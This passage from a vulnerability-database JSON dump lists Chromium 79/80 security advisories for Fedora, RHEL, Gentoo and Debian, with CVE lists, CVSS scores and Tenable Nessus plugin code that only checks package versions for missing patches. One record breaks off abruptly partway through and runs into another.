"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:12", "description": "Update to Chromium 79. Fixes the usual giant pile of bugs and security issues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728 CVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734 CVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737 CVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741 CVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745 CVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749 CVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753 CVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757 CVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762 CVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "nessus", "title": "Fedora 31 : chromium (2019-1a10c04281)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", "CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2019-1A10C04281.NASL", "href": "https://www.tenable.com/plugins/nessus/132111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-1a10c04281.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(132111);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", 
\"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\");\n script_xref(name:\"FEDORA\", value:\"2019-1a10c04281\");\n\n script_name(english:\"Fedora 31 : chromium (2019-1a10c04281)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to Chromium 79. Fixes the usual giant pile of bugs and security\nissues. This time, the list is :\n\nCVE-2019-13725 CVE-2019-13726 CVE-2019-13727 CVE-2019-13728\nCVE-2019-13729 CVE-2019-13730 CVE-2019-13732 CVE-2019-13734\nCVE-2019-13735 CVE-2019-13764 CVE-2019-13736 CVE-2019-13737\nCVE-2019-13738 CVE-2019-13739 CVE-2019-13740 CVE-2019-13741\nCVE-2019-13742 CVE-2019-13743 CVE-2019-13744 CVE-2019-13745\nCVE-2019-13746 CVE-2019-13747 CVE-2019-13748 CVE-2019-13749\nCVE-2019-13750 CVE-2019-13751 CVE-2019-13752 CVE-2019-13753\nCVE-2019-13754 CVE-2019-13755 CVE-2019-13756 CVE-2019-13757\nCVE-2019-13758 CVE-2019-13759 CVE-2019-13761 CVE-2019-13762\nCVE-2019-13763\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-1a10c04281\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"chromium-79.0.3945.79-1.fc31\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-12T15:32:08", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 79.0.3945.79.\n\nSecurity Fix(es) :\n\n* chromium-browser: Use after free in Bluetooth (CVE-2019-13725)\n\n* chromium-browser: Heap buffer overflow in password manager (CVE-2019-13726)\n\n* chromium-browser: Insufficient policy enforcement in WebSockets (CVE-2019-13727)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13728)\n\n* chromium-browser: Use after free in WebSockets (CVE-2019-13729)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13730)\n\n* chromium-browser: Use after free in WebAudio (CVE-2019-13732)\n\n* chromium-browser: Out of bounds write in SQLite (CVE-2019-13734)\n\n* chromium-browser: Out of bounds write in V8 (CVE-2019-13735)\n\n* chromium-browser: Type Confusion in V8 (CVE-2019-13764)\n\n* chromium-browser: Integer overflow in PDFium (CVE-2019-13736)\n\n* chromium-browser: Insufficient policy enforcement in autocomplete (CVE-2019-13737)\n\n* chromium-browser: Insufficient policy enforcement in navigation (CVE-2019-13738)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13739)\n\n* chromium-browser: Incorrect security UI in sharing (CVE-2019-13740)\n\n* chromium-browser: Insufficient validation of untrusted input in Blink (CVE-2019-13741)\n\n* chromium-browser: Incorrect security UI in Omnibox (CVE-2019-13742)\n\n* chromium-browser: Incorrect security UI in external protocol handling (CVE-2019-13743)\n\n* chromium-browser: Insufficient policy enforcement in cookies (CVE-2019-13744)\n\n* chromium-browser: Insufficient policy enforcement in audio (CVE-2019-13745)\n\n* chromium-browser: Insufficient policy enforcement in Omnibox (CVE-2019-13746)\n\n* chromium-browser: Uninitialized Use in rendering (CVE-2019-13747)\n\n* 
script_name(english:\"GLSA-202003-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202003-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n A remote attacker could execute arbitrary code, escalate privileges,\n obtain sensitive information, spoof an URL or cause a Denial of Service\n condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202003-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-80.0.3987.132'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-80.0.3987.132'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6420\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", 
value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 80.0.3987.132\"), vulnerable:make_list(\"lt 80.0.3987.132\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:05:53", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-13725 Gengming Liu and Jianyu Chen discovered a use-after-free issue in the bluetooth implementation.\n\n - CVE-2019-13726 Sergei Glazunov discovered a buffer overflow issue.\n\n - CVE-2019-13727 @piochu discovered a policy enforcement error.\n\n - CVE-2019-13728 Rong Jian and Guang Gong discovered an out-of-bounds write error in the v8 JavaScript library.\n\n - CVE-2019-13729 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-13730 Soyeon Park and Wen Xu discovered the use of a wrong type in the v8 JavaScript library.\n\n - CVE-2019-13732 Sergei Glazunov 
discovered a use-after-free issue in the WebAudio implementation.\n\n - CVE-2019-13734 Wenxiang Qian discovered an out-of-bounds write issue in the sqlite library.\n\n - CVE-2019-13735 Gengming Liu and Zhen Feng discovered an out-of-bounds write issue in the v8 JavaScript library.\n\n - CVE-2019-13736 An integer overflow issue was discovered in the pdfium library.\n\n - CVE-2019-13737 Mark Amery discovered a policy enforcement error.\n\n - CVE-2019-13738 Johnathan Norman and Daniel Clark discovered a policy enforcement error.\n\n - CVE-2019-13739 xisigr discovered a user interface error.\n\n - CVE-2019-13740 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13741 Michal Bentkowski discovered that user input could be incompletely validated.\n\n - CVE-2019-13742 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13743 Zhiyang Zeng discovered a user interface error.\n\n - CVE-2019-13744 Prakash discovered a policy enforcement error.\n\n - CVE-2019-13745 Luan Herrera discovered a policy enforcement error.\n\n - CVE-2019-13746 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13747 Ivan Popelyshev and Andre Bonatti discovered an uninitialized value.\n\n - CVE-2019-13748 David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13749 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13750 Wenxiang Qian discovered insufficient validation of data in the sqlite library.\n\n - CVE-2019-13751 Wenxiang Qian discovered an uninitialized value in the sqlite library.\n\n - CVE-2019-13752 Wenxiang Qian discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-13753 Wenxiang Qian discovered an out-of-bounds read issue in the sqlite library.\n\n - CVE-2019-13754 Cody Crews discovered a policy enforcement error.\n\n - CVE-2019-13755 Masato Kinugawa discovered a policy enforcement error.\n\n - CVE-2019-13756 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13757 Khalil Zhani discovered a user 
interface error.\n\n - CVE-2019-13758 Khalil Zhani discovered a policy enforecement error.\n\n - CVE-2019-13759 Wenxu Wu discovered a user interface error.\n\n - CVE-2019-13761 Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13762 csanuragjain discovered a policy enforecement error.\n\n - CVE-2019-13763 weiwangpp93 discovered a policy enforecement error.\n\n - CVE-2019-13764 Soyeon Park and Wen Xu discovered the use of a wrong type in the v8 JavaScript library.\n\n - CVE-2019-13767 Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6377 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2020-6378 Antti Levomaki and Christian Jalio discovered a use-after-free issue.\n\n - CVE-2020-6379 Guang Gong discovered a use-after-free issue.\n\n - CVE-2020-6380 Sergei Glazunov discovered an error verifying extension messages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-01-21T00:00:00", "type": "nessus", "title": "Debian DSA-4606-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13725", "CVE-2019-13726", "CVE-2019-13727", 
"CVE-2019-13728", "CVE-2019-13729", "CVE-2019-13730", "CVE-2019-13732", "CVE-2019-13734", "CVE-2019-13735", "CVE-2019-13736", "CVE-2019-13737", "CVE-2019-13738", "CVE-2019-13739", "CVE-2019-13740", "CVE-2019-13741", "CVE-2019-13742", "CVE-2019-13743", "CVE-2019-13744", "CVE-2019-13745", "CVE-2019-13746", "CVE-2019-13747", "CVE-2019-13748", "CVE-2019-13749", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-13752", "CVE-2019-13753", "CVE-2019-13754", "CVE-2019-13755", "CVE-2019-13756", "CVE-2019-13757", "CVE-2019-13758", "CVE-2019-13759", "CVE-2019-13761", "CVE-2019-13762", "CVE-2019-13763", "CVE-2019-13764", "CVE-2019-13767", "CVE-2020-6377", "CVE-2020-6378", "CVE-2020-6379", "CVE-2020-6380"], "modified": "2020-03-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4606.NASL", "href": "https://www.tenable.com/plugins/nessus/133109", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4606. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133109);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/02\");\n\n script_cve_id(\"CVE-2019-13725\", \"CVE-2019-13726\", \"CVE-2019-13727\", \"CVE-2019-13728\", \"CVE-2019-13729\", \"CVE-2019-13730\", \"CVE-2019-13732\", \"CVE-2019-13734\", \"CVE-2019-13735\", \"CVE-2019-13736\", \"CVE-2019-13737\", \"CVE-2019-13738\", \"CVE-2019-13739\", \"CVE-2019-13740\", \"CVE-2019-13741\", \"CVE-2019-13742\", \"CVE-2019-13743\", \"CVE-2019-13744\", \"CVE-2019-13745\", \"CVE-2019-13746\", \"CVE-2019-13747\", \"CVE-2019-13748\", \"CVE-2019-13749\", \"CVE-2019-13750\", \"CVE-2019-13751\", \"CVE-2019-13752\", \"CVE-2019-13753\", \"CVE-2019-13754\", \"CVE-2019-13755\", \"CVE-2019-13756\", \"CVE-2019-13757\", \"CVE-2019-13758\", \"CVE-2019-13759\", \"CVE-2019-13761\", \"CVE-2019-13762\", \"CVE-2019-13763\", \"CVE-2019-13764\", \"CVE-2019-13767\", \"CVE-2020-6377\", \"CVE-2020-6378\", \"CVE-2020-6379\", \"CVE-2020-6380\");\n script_xref(name:\"DSA\", value:\"4606\");\n\n script_name(english:\"Debian DSA-4606-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-13725\n Gengming Liu and Jianyu Chen discovered a use-after-free\n issue in the bluetooth implementation.\n\n - CVE-2019-13726\n Sergei Glazunov discovered a buffer overflow issue.\n\n - CVE-2019-13727\n @piochu discovered a policy enforcement error.\n\n - CVE-2019-13728\n Rong Jian and Guang Gong discovered an out-of-bounds\n write error in the v8 JavaScript library.\n\n - CVE-2019-13729\n Zhe 
Jin discovered a use-after-free issue.\n\n - CVE-2019-13730\n Soyeon Park and Wen Xu discovered the use of a wrong\n type in the v8 JavaScript library.\n\n - CVE-2019-13732\n Sergei Glazunov discovered a use-after-free issue in the\n WebAudio implementation.\n\n - CVE-2019-13734\n Wenxiang Qian discovered an out-of-bounds write issue in\n the sqlite library.\n\n - CVE-2019-13735\n Gengming Liu and Zhen Feng discovered an out-of-bounds\n write issue in the v8 JavaScript library.\n\n - CVE-2019-13736\n An integer overflow issue was discovered in the pdfium\n library.\n\n - CVE-2019-13737\n Mark Amery discovered a policy enforcement error.\n\n - CVE-2019-13738\n Johnathan Norman and Daniel Clark discovered a policy\n enforcement error.\n\n - CVE-2019-13739\n xisigr discovered a user interface error.\n\n - CVE-2019-13740\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13741\n Michal Bentkowski discovered that user input could be\n incompletely validated.\n\n - CVE-2019-13742\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13743\n Zhiyang Zeng discovered a user interface error.\n\n - CVE-2019-13744\n Prakash discovered a policy enforcement error.\n\n - CVE-2019-13745\n Luan Herrera discovered a policy enforcement error.\n\n - CVE-2019-13746\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13747\n Ivan Popelyshev and Andre Bonatti discovered an\n uninitialized value.\n\n - CVE-2019-13748\n David Erceg discovered a policy enforcement error.\n\n - CVE-2019-13749\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13750\n Wenxiang Qian discovered insufficient validation of data\n in the sqlite library.\n\n - CVE-2019-13751\n Wenxiang Qian discovered an uninitialized value in the\n sqlite library.\n\n - CVE-2019-13752\n Wenxiang Qian discovered an out-of-bounds read issue in\n the sqlite library.\n\n - CVE-2019-13753\n Wenxiang Qian discovered an out-of-bounds read issue in\n the sqlite library.\n\n - 
CVE-2019-13754\n Cody Crews discovered a policy enforcement error.\n\n - CVE-2019-13755\n Masato Kinugawa discovered a policy enforcement error.\n\n - CVE-2019-13756\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13757\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13758\n Khalil Zhani discovered a policy enforecement error.\n\n - CVE-2019-13759\n Wenxu Wu discovered a user interface error.\n\n - CVE-2019-13761\n Khalil Zhani discovered a user interface error.\n\n - CVE-2019-13762\n csanuragjain discovered a policy enforecement error.\n\n - CVE-2019-13763\n weiwangpp93 discovered a policy enforecement error.\n\n - CVE-2019-13764\n Soyeon Park and Wen Xu discovered the use of a wrong\n type in the v8 JavaScript library.\n\n - CVE-2019-13767\n Sergei Glazunov discovered a use-after-free issue.\n\n - CVE-2020-6377\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2020-6378\n Antti Levomaki and Christian Jalio discovered a\n use-after-free issue.\n\n - CVE-2020-6379\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2020-6380\n Sergei Glazunov discovered an error verifying extension\n messages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13728\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2019-13732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13740\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13741\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13742\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13744\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13745\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13746\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13747\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13748\"\n );\n script_set_attribute(\n 
